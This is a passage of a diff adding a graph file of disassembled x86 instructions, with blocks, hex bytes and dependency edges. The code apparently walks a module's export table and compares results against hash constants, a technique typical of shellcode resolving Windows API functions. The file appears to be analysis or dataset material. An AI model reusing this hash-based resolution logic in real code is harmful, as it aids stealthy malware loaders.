+        <edge source="block.0x10ce:instruction.0x10cf" target="block.0x10ce:instruction.0x10d5"/>
+        <edge source="block.0x10ce:instruction.0x10cf" target="block.0x10ce:instruction.0x10da"/>
+        <edge source="block.0x10ce:instruction.0x10d2" target="block.0x10ce:instruction.0x10d5"/>
+        <edge source="block.0x10ce:instruction.0x10d2" target="block.0x10ce:instruction.0x10da"/>
+        <edge source="block.0x10ce:instruction.0x10d5" target="block.0x10ce:instruction.0x10d7"/>
+        <edge source="block.0x10ce:instruction.0x10d5" target="block.0x10ce:instruction.0x10da"/>
+        <edge source="block.0x10ce:instruction.0x10d7" target="block.0x10ce:instruction.0x10da"/>
+      </graph>
+    </node>
+    <node id="block.0x10df">
+      <data key="address">0x10df</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x10df</data>
+        <data key="type">instructions</data>
+        <node id="block.0x10df:instruction.0x10df">
+          <data key="address">0x10df</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">8945b8</data>
+          <data key="instruction.source">mov dword ptr [ebp - 0x48], eax</data>
+        </node>
+        <node id="block.0x10df:instruction.0x10e2">
+          <data key="address">0x10e2</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">3d8e4e0eec</data>
+          <data key="instruction.source">cmp eax, 0xec0e4e8e</data>
+        </node>
+        <node id="block.0x10df:instruction.0x10e7">
+          <data key="address">0x10e7</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">7409</data>
+          <data key="instruction.source">je 0x10f2</data>
+        </node>
+        <edge source="block.0x10df:instruction.0x10df" target="block.0x10df:instruction.0x10e7"/>
+        <edge source="block.0x10df:instruction.0x10e2" target="block.0x10df:instruction.0x10e7"/>
+      </graph>
+    </node>
+    <node id="block.0x10e9">
+      <data key="address">0x10e9</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x10e9</data>
+        <data key="type">instructions</data>
+        <node id="block.0x10e9:instruction.0x10e9">
+          <data key="address">0x10e9</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">3daafc0d7c</data>
+          <data key="instruction.source">cmp eax, 0x7c0dfcaa</data>
+        </node>
+        <node id="block.0x10e9:instruction.0x10ee">
+          <data key="address">0x10ee</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">7402</data>
+          <data key="instruction.source">je 0x10f2</data>
+        </node>
+        <edge source="block.0x10e9:instruction.0x10e9" target="block.0x10e9:instruction.0x10ee"/>
+      </graph>
+    </node>
+    <node id="block.0x10f0">
+      <data key="address">0x10f0</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x10f0</data>
+        <data key="type">instructions</data>
+        <node id="block.0x10f0:instruction.0x10f0">
+          <data key="address">0x10f0</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">eb36</data>
+          <data key="instruction.source">jmp 0x1128</data>
+        </node>
+      </graph>
+    </node>
+    <node id="block.0x10f2">
+      <data key="address">0x10f2</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x10f2</data>
+        <data key="type">instructions</data>
+        <node id="block.0x10f2:instruction.0x10f2">
+          <data key="address">0x10f2</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">8b55e0</data>
+          <data key="instruction.source">mov edx, dword ptr [ebp - 0x20]</data>
+        </node>
+        <node id="block.0x10f2:instruction.0x10f5">
+          <data key="address">0x10f5</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">8b521c</data>
+          <data key="instruction.source">mov edx, dword ptr [edx + 0x1c]</data>
+        </node>
+        <node id="block.0x10f2:instruction.0x10f8">
+          <data key="address">0x10f8</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">0355e8</data>
+          <data key="instruction.source">add edx, dword ptr [ebp - 0x18]</data>
+        </node>
+        <node id="block.0x10f2:instruction.0x10fb">
+          <data key="address">0x10fb</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">8b4dd8</data>
+          <data key="instruction.source">mov ecx, dword ptr [ebp - 0x28]</data>
+        </node>
+        <node id="block.0x10f2:instruction.0x10fe">
+          <data key="address">0x10fe</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">0fb709</data>
+          <data key="instruction.source">movzx ecx, word ptr [ecx]</data>
+        </node>
+        <node id="block.0x10f2:instruction.0x1101">
+          <data key="address">0x1101</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">8b148a</data>
+          <data key="instruction.source">mov edx, dword ptr [edx + ecx*4]</data>
+        </node>
+        <node id="block.0x10f2:instruction.0x1104">
+          <data key="address">0x1104</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">0355e8</data>
+          <data key="instruction.source">add edx, dword ptr [ebp - 0x18]</data>
+        </node>
+        <node id="block.0x10f2:instruction.0x1107">
+          <data key="address">0x1107</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">8b45b8</data>
+          <data key="instruction.source">mov eax, dword ptr [ebp - 0x48]</data>
+        </node>
+        <node id="block.0x10f2:instruction.0x110a">
+          <data key="address">0x110a</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">3d8e4e0eec</data>
+          <data key="instruction.source">cmp eax, 0xec0e4e8e</data>
+        </node>
+        <node id="block.0x10f2:instruction.0x110f">
+          <data key="address">0x110f</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">7505</data>
+          <data key="instruction.source">jne 0x1116</data>
+        </node>
+        <edge source="block.0x10f2:instruction.0x10f2" target="block.0x10f2:instruction.0x10f5"/>
+        <edge source="block.0x10f2:instruction.0x10f5" target="block.0x10f2:instruction.0x10f8"/>
+        <edge source="block.0x10f2:instruction.0x10f8" target="block.0x10f2:instruction.0x1101"/>
+        <edge source="block.0x10f2:instruction.0x10f8" target="block.0x10f2:instruction.0x1104"/>
+        <edge source="block.0x10f2:instruction.0x10fb" target="block.0x10f2:instruction.0x10fe"/>
+        <edge source="block.0x10f2:instruction.0x10fe" target="block.0x10f2:instruction.0x1101"/>
+        <edge source="block.0x10f2:instruction.0x1101" target="block.0x10f2:instruction.0x1104"/>
+        <edge source="block.0x10f2:instruction.0x1104" target="block.0x10f2:instruction.0x110a"/>
+        <edge source="block.0x10f2:instruction.0x1107" target="block.0x10f2:instruction.0x110a"/>
+        <edge source="block.0x10f2:instruction.0x110a" target="block.0x10f2:instruction.0x110f"/>
+      </graph>
+    </node>
+    <node id="block.0x1111">
+      <data key="address">0x1111</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x1111</data>
+        <data key="type">instructions</data>
+        <node id="block.0x1111:instruction.0x1111">
+          <data key="address">0x1111</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">8955fc</data>
+          <data key="instruction.source">mov dword ptr [ebp - 4], edx</data>
+        </node>
+        <node id="block.0x1111:instruction.0x1114">
+          <data key="address">0x1114</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">eb03</data>
+          <data key="instruction.source">jmp 0x1119</data>
+        </node>
+        <edge source="block.0x1111:instruction.0x1111" target="block.0x1111:instruction.0x1114"/>
+      </graph>
+    </node>
+    <node id="block.0x1116">
+      <data key="address">0x1116</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x1116</data>
+        <data key="type">instructions</data>
+        <node id="block.0x1116:instruction.0x1116">
+          <data key="address">0x1116</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">8955f8</data>
+          <data key="instruction.source">mov dword ptr [ebp - 8], edx</data>
+        </node>
+      </graph>
+    </node>
+    <node id="block.0x1119">
+      <data key="address">0x1119</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x1119</data>
+        <data key="type">instructions</data>
+        <node id="block.0x1119:instruction.0x1119">
+          <data key="address">0x1119</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">8b45bc</data>
+          <data key="instruction.source">mov eax, dword ptr [ebp - 0x44]</data>
+        </node>
+        <node id="block.0x1119:instruction.0x111c">
+          <data key="address">0x111c</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">48</data>
+          <data key="instruction.source">dec eax</data>
+        </node>
+        <node id="block.0x1119:instruction.0x111d">
+          <data key="address">0x111d</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">8945bc</data>
+          <data key="instruction.source">mov dword ptr [ebp - 0x44], eax</data>
+        </node>
+        <node id="block.0x1119:instruction.0x1120">
+          <data key="address">0x1120</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">85c0</data>
+          <data key="instruction.source">test eax, eax</data>
+        </node>
+        <node id="block.0x1119:instruction.0x1122">
+          <data key="address">0x1122</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">0f8499000000</data>
+          <data key="instruction.source">je 0x11c1</data>
+        </node>
+        <edge source="block.0x1119:instruction.0x1119" target="block.0x1119:instruction.0x111c"/>
+        <edge source="block.0x1119:instruction.0x1119" target="block.0x1119:instruction.0x111d"/>
+        <edge source="block.0x1119:instruction.0x111c" target="block.0x1119:instruction.0x111d"/>
+        <edge source="block.0x1119:instruction.0x111c" target="block.0x1119:instruction.0x1120"/>
+        <edge source="block.0x1119:instruction.0x111d" target="block.0x1119:instruction.0x1122"/>
+        <edge source="block.0x1119:instruction.0x1120" target="block.0x1119:instruction.0x1122"/>
+      </graph>
+    </node>
+    <node id="block.0x1128">
+      <data key="address">0x1128</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x1128</data>
+        <data key="type">instructions</data>
+        <node id="block.0x1128:instruction.0x1128">
+          <data key="address">0x1128</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">8345dc04</data>
+          <data key="instruction.source">add dword ptr [ebp - 0x24], 4</data>
+        </node>
+        <node id="block.0x1128:instruction.0x112c">
+          <data key="address">0x112c</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">8345d802</data>
+          <data key="instruction.source">add dword ptr [ebp - 0x28], 2</data>
+        </node>
+        <node id="block.0x1128:instruction.0x1130">
+          <data key="address">0x1130</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">eb91</data>
+          <data key="instruction.source">jmp 0x10c3</data>
+        </node>
+        <edge source="block.0x1128:instruction.0x1128" target="block.0x1128:instruction.0x112c"/>
+        <edge source="block.0x1128:instruction.0x112c" target="block.0x1128:instruction.0x1130"/>
+      </graph>
+    </node>
+    <node id="block.0x1132">
+      <data key="address">0x1132</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x1132</data>
+        <data key="type">instructions</data>
+        <node id="block.0x1132:instruction.0x1132">
+          <data key="address">0x1132</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">8b45d0</data>
+          <data key="instruction.source">mov eax, dword ptr [ebp - 0x30]</data>
+        </node>
+        <node id="block.0x1132:instruction.0x1135">
+          <data key="address">0x1135</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">8b7010</data>
+          <data key="instruction.source">mov esi, dword ptr [eax + 0x10]</data>
+        </node>
+        <node id="block.0x1132:instruction.0x1138">
+          <data key="address">0x1138</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">8975e8</data>
+          <data key="instruction.source">mov dword ptr [ebp - 0x18], esi</data>
+        </node>
+        <node id="block.0x1132:instruction.0x113b">
+          <data key="address">0x113b</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">e8de020000</data>
+          <data key="instruction.source">call 0x141e</data>
+        </node>
+        <edge source="block.0x1132:instruction.0x1132" target="block.0x1132:instruction.0x1135"/>
+        <edge source="block.0x1132:instruction.0x1132" target="block.0x1132:instruction.0x113b"/>
+        <edge source="block.0x1132:instruction.0x1135" target="block.0x1132:instruction.0x1138"/>
+        <edge source="block.0x1132:instruction.0x1138" target="block.0x1132:instruction.0x113b"/>
+      </graph>
+    </node>
+    <node id="block.0x1140">
+      <data key="address">0x1140</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x1140</data>
+        <data key="type">instructions</data>
+        <node id="block.0x1140:instruction.0x1140">
+          <data key="address">0x1140</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">c745bc03000000</data>
+          <data key="instruction.source">mov dword ptr [ebp - 0x44], 3</data>
+        </node>
+      </graph>
+    </node>
+    <node id="block.0x1147">
+      <data key="address">0x1147</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x1147</data>
+        <data key="type">instructions</data>
+        <node id="block.0x1147:instruction.0x1147">
+          <data key="address">0x1147</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">8b45c8</data>
+          <data key="instruction.source">mov eax, dword ptr [ebp - 0x38]</data>
+        </node>
+        <node id="block.0x1147:instruction.0x114a">
+          <data key="address">0x114a</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">85c0</data>
+          <data key="instruction.source">test eax, eax</data>
+        </node>
+        <node id="block.0x1147:instruction.0x114c">
+          <data key="address">0x114c</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">7473</data>
+          <data key="instruction.source">je 0x11c1</data>
+        </node>
+        <edge source="block.0x1147:instruction.0x1147" target="block.0x1147:instruction.0x114a"/>
+        <edge source="block.0x1147:instruction.0x114a" target="block.0x1147:instruction.0x114c"/>
+      </graph>
+    </node>
+    <node id="block.0x114e">
+      <data key="address">0x114e</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x114e</data>
+        <data key="type">instructions</data>
+        <node id="block.0x114e:instruction.0x114e">
+          <data key="address">0x114e</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">48</data>
+          <data key="instruction.source">dec eax</data>
+        </node>
+        <node id="block.0x114e:instruction.0x114f">
+          <data key="address">0x114f</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">8945c8</data>
+          <data key="instruction.source">mov dword ptr [ebp - 0x38], eax</data>
+        </node>
+        <node id="block.0x114e:instruction.0x1152">
+          <data key="address">0x1152</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">8b4ddc</data>
+          <data key="instruction.source">mov ecx, dword ptr [ebp - 0x24]</data>
+        </node>
+        <node id="block.0x114e:instruction.0x1155">
+          <data key="address">0x1155</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">8b09</data>
+          <data key="instruction.source">mov ecx, dword ptr [ecx]</data>
+        </node>
+        <node id="block.0x114e:instruction.0x1157">
+          <data key="address">0x1157</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">034de8</data>
+          <data key="instruction.source">add ecx, dword ptr [ebp - 0x18]</data>
+        </node>
+        <node id="block.0x114e:instruction.0x115a">
+          <data key="address">0x115a</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">e8e6020000</data>
+          <data key="instruction.source">call 0x1445</data>
+        </node>
+        <edge source="block.0x114e:instruction.0x114e" target="block.0x114e:instruction.0x114f"/>
+        <edge source="block.0x114e:instruction.0x114e" target="block.0x114e:instruction.0x1157"/>
+        <edge source="block.0x114e:instruction.0x114f" target="block.0x114e:instruction.0x1155"/>
+        <edge source="block.0x114e:instruction.0x114f" target="block.0x114e:instruction.0x115a"/>
+        <edge source="block.0x114e:instruction.0x1152" target="block.0x114e:instruction.0x1155"/>
+        <edge source="block.0x114e:instruction.0x1152" target="block.0x114e:instruction.0x115a"/>
+        <edge source="block.0x114e:instruction.0x1155" target="block.0x114e:instruction.0x1157"/>
+        <edge source="block.0x114e:instruction.0x1155" target="block.0x114e:instruction.0x115a"/>
+        <edge source="block.0x114e:instruction.0x1157" target="block.0x114e:instruction.0x115a"/>
+      </graph>
+    </node>
+    <node id="block.0x115f">
+      <data key="address">0x115f</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x115f</data>
+        <data key="type">instructions</data>
+        <node id="block.0x115f:instruction.0x115f">
+          <data key="address">0x115f</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">8945b8</data>
+          <data key="instruction.source">mov dword ptr [ebp - 0x48], eax</data>
+        </node>
+        <node id="block.0x115f:instruction.0x1162">
+          <data key="address">0x1162</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">3db80a4c53</data>
+          <data key="instruction.source">cmp eax, 0x534c0ab8</data>
+        </node>
+        <node id="block.0x115f:instruction.0x1167">
+          <data key="address">0x1167</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">7410</data>
+          <data key="instruction.source">je 0x1179</data>
+        </node>
+        <edge source="block.0x115f:instruction.0x115f" target="block.0x115f:instruction.0x1167"/>
+        <edge source="block.0x115f:instruction.0x1162" target="block.0x115f:instruction.0x1167"/>
+      </graph>
+    </node>
+    <node id="block.0x1169">
+      <data key="address">0x1169</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x1169</data>
+        <data key="type">instructions</data>
+        <node id="block.0x1169:instruction.0x1169">
+          <data key="address">0x1169</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">3ded4a3dd3</data>
+          <data key="instruction.source">cmp eax, 0xd33d4aed</data>
+        </node>
+        <node id="block.0x1169:instruction.0x116e">
+          <data key="address">0x116e</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">7409</data>
+          <data key="instruction.source">je 0x1179</data>
+        </node>
+        <edge source="block.0x1169:instruction.0x1169" target="block.0x1169:instruction.0x116e"/>
+      </graph>
+    </node>
+    <node id="block.0x1170">
+      <data key="address">0x1170</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x1170</data>
+        <data key="type">instructions</data>
+        <node id="block.0x1170:instruction.0x1170">
+          <data key="address">0x1170</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">3d894d3fbc</data>
+          <data key="instruction.source">cmp eax, 0xbc3f4d89</data>
+        </node>
+        <node id="block.0x1170:instruction.0x1175">
+          <data key="address">0x1175</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">7402</data>
+          <data key="instruction.source">je 0x1179</data>
+        </node>
+        <edge source="block.0x1170:instruction.0x1170" target="block.0x1170:instruction.0x1175"/>
+      </graph>
+    </node>
+    <node id="block.0x1177">
+      <data key="address">0x1177</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x1177</data>
+        <data key="type">instructions</data>
+        <node id="block.0x1177:instruction.0x1177">
+          <data key="address">0x1177</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">eb3e</data>
+          <data key="instruction.source">jmp 0x11b7</data>
+        </node>
+      </graph>
+    </node>
+    <node id="block.0x1179">
+      <data key="address">0x1179</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x1179</data>
+        <data key="type">instructions</data>
+        <node id="block.0x1179:instruction.0x1179">
+          <data key="address">0x1179</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">8b55e0</data>
+          <data key="instruction.source">mov edx, dword ptr [ebp - 0x20]</data>
+        </node>
+        <node id="block.0x1179:instruction.0x117c">
+          <data key="address">0x117c</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">8b521c</data>
+          <data key="instruction.source">mov edx, dword ptr [edx + 0x1c]</data>
+        </node>
+        <node id="block.0x1179:instruction.0x117f">
+          <data key="address">0x117f</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">0355e8</data>
+          <data key="instruction.source">add edx, dword ptr [ebp - 0x18]</data>
+        </node>
+        <node id="block.0x1179:instruction.0x1182">
+          <data key="address">0x1182</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">8b4dd8</data>
+          <data key="instruction.source">mov ecx, dword ptr [ebp - 0x28]</data>
+        </node>
+        <node id="block.0x1179:instruction.0x1185">
+          <data key="address">0x1185</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">0fb709</data>
+          <data key="instruction.source">movzx ecx, word ptr [ecx]</data>
+        </node>
+        <node id="block.0x1179:instruction.0x1188">
+          <data key="address">0x1188</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">8b148a</data>
+          <data key="instruction.source">mov edx, dword ptr [edx + ecx*4]</data>
+        </node>
+        <node id="block.0x1179:instruction.0x118b">
+          <data key="address">0x118b</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">0355e8</data>
+          <data key="instruction.source">add edx, dword ptr [ebp - 0x18]</data>
+        </node>
+        <node id="block.0x1179:instruction.0x118e">
+          <data key="address">0x118e</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">8b45b8</data>
+          <data key="instruction.source">mov eax, dword ptr [ebp - 0x48]</data>
+        </node>
+        <node id="block.0x1179:instruction.0x1191">
+          <data key="address">0x1191</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">3db80a4c53</data>
+          <data key="instruction.source">cmp eax, 0x534c0ab8</data>
+        </node>
+        <node id="block.0x1179:instruction.0x1196">
+          <data key="address">0x1196</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">7505</data>
+          <data key="instruction.source">jne 0x119d</data>
+        </node>
+        <edge source="block.0x1179:instruction.0x1179" target="block.0x1179:instruction.0x117c"/>
+        <edge source="block.0x1179:instruction.0x117c" target="block.0x1179:instruction.0x117f"/>
+        <edge source="block.0x1179:instruction.0x117f" target="block.0x1179:instruction.0x1188"/>
+        <edge source="block.0x1179:instruction.0x117f" target="block.0x1179:instruction.0x118b"/>
+        <edge source="block.0x1179:instruction.0x1182" target="block.0x1179:instruction.0x1185"/>
+        <edge source="block.0x1179:instruction.0x1185" target="block.0x1179:instruction.0x1188"/>
+        <edge source="block.0x1179:instruction.0x1188" target="block.0x1179:instruction.0x118b"/>
+        <edge source="block.0x1179:instruction.0x118b" target="block.0x1179:instruction.0x1191"/>
+        <edge source="block.0x1179:instruction.0x118e" target="block.0x1179:instruction.0x1191"/>
+        <edge source="block.0x1179:instruction.0x1191" target="block.0x1179:instruction.0x1196"/>
+      </graph>
+    </node>
+    <node id="block.0x1198">
+      <data key="address">0x1198</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x1198</data>
+        <data key="type">instructions</data>
+        <node id="block.0x1198:instruction.0x1198">
+          <data key="address">0x1198</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">8955f0</data>
+          <data key="instruction.source">mov dword ptr [ebp - 0x10], edx</data>
+        </node>
+        <node id="block.0x1198:instruction.0x119b">
+          <data key="address">0x119b</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">eb0f</data>
+          <data key="instruction.source">jmp 0x11ac</data>
+        </node>
+        <edge source="block.0x1198:instruction.0x1198" target="block.0x1198:instruction.0x119b"/>
+      </graph>
+    </node>
+    <node id="block.0x119d">
+      <data key="address">0x119d</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x119d</data>
+        <data key="type">instructions</data>
+        <node id="block.0x119d:instruction.0x119d">
+          <data key="address">0x119d</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">3ded4a3dd3</data>
+          <data key="instruction.source">cmp eax, 0xd33d4aed</data>
+        </node>
+        <node id="block.0x119d:instruction.0x11a2">
+          <data key="address">0x11a2</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">7505</data>
+          <data key="instruction.source">jne 0x11a9</data>
+        </node>
+        <edge source="block.0x119d:instruction.0x119d" target="block.0x119d:instruction.0x11a2"/>
+      </graph>
+    </node>
+    <node id="block.0x11a4">
+      <data key="address">0x11a4</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x11a4</data>
+        <data key="type">instructions</data>
+        <node id="block.0x11a4:instruction.0x11a4">
+          <data key="address">0x11a4</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">8955f4</data>
+          <data key="instruction.source">mov dword ptr [ebp - 0xc], edx</data>
+        </node>
+        <node id="block.0x11a4:instruction.0x11a7">
+          <data key="address">0x11a7</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">eb03</data>
+          <data key="instruction.source">jmp 0x11ac</data>
+        </node>
+        <edge source="block.0x11a4:instruction.0x11a4" target="block.0x11a4:instruction.0x11a7"/>
+      </graph>
+    </node>
+    <node id="block.0x11a9">
+      <data key="address">0x11a9</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x11a9</data>
+        <data key="type">instructions</data>
+        <node id="block.0x11a9:instruction.0x11a9">
+          <data key="address">0x11a9</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">8955b4</data>
+          <data key="instruction.source">mov dword ptr [ebp - 0x4c], edx</data>
+        </node>
+      </graph>
+    </node>
+    <node id="block.0x11ac">
+      <data key="address">0x11ac</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x11ac</data>
+        <data key="type">instructions</data>
+        <node id="block.0x11ac:instruction.0x11ac">
+          <data key="address">0x11ac</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">8b45bc</data>
+          <data key="instruction.source">mov eax, dword ptr [ebp - 0x44]</data>
+        </node>
+        <node id="block.0x11ac:instruction.0x11af">
+          <data key="address">0x11af</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">48</data>
+          <data key="instruction.source">dec eax</data>
+        </node>
+        <node id="block.0x11ac:instruction.0x11b0">
+          <data key="address">0x11b0</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">8945bc</data>
+          <data key="instruction.source">mov dword ptr [ebp - 0x44], eax</data>
+        </node>
+        <node id="block.0x11ac:instruction.0x11b3">
+          <data key="address">0x11b3</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">85c0</data>
+          <data key="instruction.source">test eax, eax</data>
+        </node>
+        <node id="block.0x11ac:instruction.0x11b5">
+          <data key="address">0x11b5</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">740a</data>
+          <data key="instruction.source">je 0x11c1</data>
+        </node>
+        <edge source="block.0x11ac:instruction.0x11ac" target="block.0x11ac:instruction.0x11af"/>
+        <edge source="block.0x11ac:instruction.0x11ac" target="block.0x11ac:instruction.0x11b0"/>
+        <edge source="block.0x11ac:instruction.0x11af" target="block.0x11ac:instruction.0x11b0"/>
+        <edge source="block.0x11ac:instruction.0x11af" target="block.0x11ac:instruction.0x11b3"/>
+        <edge source="block.0x11ac:instruction.0x11b0" target="block.0x11ac:instruction.0x11b5"/>
+        <edge source="block.0x11ac:instruction.0x11b3" target="block.0x11ac:instruction.0x11b5"/>
+      </graph>
+    </node>
+    <node id="block.0x11b7">
+      <data key="address">0x11b7</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x11b7</data>
+        <data key="type">instructions</data>
+        <node id="block.0x11b7:instruction.0x11b7">
+          <data key="address">0x11b7</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">8345dc04</data>
+          <data key="instruction.source">add dword ptr [ebp - 0x24], 4</data>
+        </node>
+        <node id="block.0x11b7:instruction.0x11bb">
+          <data key="address">0x11bb</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">8345d802</data>
+          <data key="instruction.source">add dword ptr [ebp - 0x28], 2</data>
+        </node>
+        <node id="block.0x11b7:instruction.0x11bf">
+          <data key="address">0x11bf</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">eb86</data>
+          <data key="instruction.source">jmp 0x1147</data>
+        </node>
+        <edge source="block.0x11b7:instruction.0x11b7" target="block.0x11b7:instruction.0x11bb"/>
+        <edge source="block.0x11b7:instruction.0x11bb" target="block.0x11b7:instruction.0x11bf"/>
+      </graph>
+    </node>
+    <node id="block.0x11c1">
+      <data key="address">0x11c1</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x11c1</data>
+        <data key="type">instructions</data>
+        <node id="block.0x11c1:instruction.0x11c1">
+          <data key="address">0x11c1</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">837dfc00</data>
+          <data key="instruction.source">cmp dword ptr [ebp - 4], 0</data>
+        </node>
+        <node id="block.0x11c1:instruction.0x11c5">
+          <data key="address">0x11c5</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">7418</data>
+          <data key="instruction.source">je 0x11df</data>
+        </node>
+        <edge source="block.0x11c1:instruction.0x11c1" target="block.0x11c1:instruction.0x11c5"/>
+      </graph>
+    </node>
+    <node id="block.0x11c7">
+      <data key="address">0x11c7</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x11c7</data>
+        <data key="type">instructions</data>
+        <node id="block.0x11c7:instruction.0x11c7">
+          <data key="address">0x11c7</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">837df800</data>
+          <data key="instruction.source">cmp dword ptr [ebp - 8], 0</data>
+        </node>
+        <node id="block.0x11c7:instruction.0x11cb">
+          <data key="address">0x11cb</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">7412</data>
+          <data key="instruction.source">je 0x11df</data>
+        </node>
+        <edge source="block.0x11c7:instruction.0x11c7" target="block.0x11c7:instruction.0x11cb"/>
+      </graph>
+    </node>
+    <node id="block.0x11cd">
+      <data key="address">0x11cd</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x11cd</data>
+        <data key="type">instructions</data>
+        <node id="block.0x11cd:instruction.0x11cd">
+          <data key="address">0x11cd</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">837df400</data>
+          <data key="instruction.source">cmp dword ptr [ebp - 0xc], 0</data>
+        </node>
+        <node id="block.0x11cd:instruction.0x11d1">
+          <data key="address">0x11d1</data>
+          <data key="type">instruction</data>
